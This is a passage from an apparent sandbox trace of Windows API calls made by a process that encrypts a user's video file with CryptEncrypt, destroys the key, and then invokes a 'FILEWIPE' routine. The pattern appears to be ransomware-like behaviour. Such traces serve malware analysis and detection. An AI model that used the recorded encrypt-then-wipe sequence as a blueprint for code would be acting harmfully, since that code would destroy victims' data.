lpMsg=0x6ae38c) returned 0 [0043.317] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0043.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0043.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0043.317] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.318] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.318] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.318] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0043.318] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.318] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0043.318] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.319] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.319] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x1667f, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x16680) returned 1 [0043.319] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.319] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0043.319] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.319] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.319] CharLowerBuffW (in: lpsz="byte[91777]", cchLength=0xb | out: lpsz="byte[91777]") returned 0xb [0043.319] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.321] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.321] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.321] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.323] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.323] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x961d18*, pdwDataLen=0x6ae220*=0x1667f, dwBufLen=0x16680 | out: pbData=0x961d18*, pdwDataLen=0x6ae220*=0x16680) returned 1 [0043.324] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.324] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0043.324] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.326] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.327] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.327] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.327] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0043.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0043.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.327] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.327] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0043.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.327] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0043.327] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0043.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0043.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0043.327] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.327] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.327] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0043.327] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0043.327] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0043.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0043.327] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.336] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.336] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0043.336] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.341] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.341] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.341] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0043.341] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.341] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.341] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0043.342] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.342] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0043.342] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.342] CryptDestroyKey (hKey=0x7c2200) returned 1 [0043.342] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0043.342] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0043.342] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0043.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0043.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.342] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0043.342] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0043.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.342] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0043.342] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0043.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0043.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0043.342] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0043.342] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.343] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0043.343] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0043.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0043.343] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0043.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0043.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0043.343] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0043.343] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0043.343] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.343] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0043.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0043.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.343] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.343] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0043.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.343] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.343] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0043.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0043.343] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.343] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0043.344] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0043.344] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.344] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0043.344] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0043.344] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0043.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0043.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0043.344] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0043.344] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.344] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0043.344] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.344] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.344] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0043.344] FreeLibrary (hLibModule=0x754b0000) returned 1 [0043.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0043.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0043.344] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0043.344] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0043.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0043.344] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.345] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.345] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.346] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.346] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0043.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0043.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0043.346] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.346] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.346] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b738d40, ftCreationTime.dwHighDateTime=0x1d5c26c, ftLastAccessTime.dwLowDateTime=0xf00cb540, ftLastAccessTime.dwHighDateTime=0x1d5bef4, ftLastWriteTime.dwLowDateTime=0xf00cb540, ftLastWriteTime.dwHighDateTime=0x1d5bef4, nFileSizeHigh=0x0, nFileSizeLow=0x1667f, dwReserved0=0x0, dwReserved1=0x777648, cFileName="02DcEZB-wigQKJ.mkv", cAlternateFileName="02DCEZ~1.MKV")) returned 0x7c2240 [0043.346] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0043.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0043.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0043.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0043.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0043.346] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.346] CharLowerBuffW (in: lpsz="byte[91775]", cchLength=0xb | out: lpsz="byte[91775]") returned 0xb [0043.347] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.347] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0043.347] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0043.347] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.347] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.347] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0043.347] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0043.347] FreeLibrary (hLibModule=0x76b40000) returned 1 [0043.347] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0043.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0043.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0043.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0043.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0043.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0043.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0043.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0043.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0043.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0043.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0043.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0043.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0043.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0043.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0043.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0043.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0043.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0043.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0043.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0043.348] HeapFree (in: 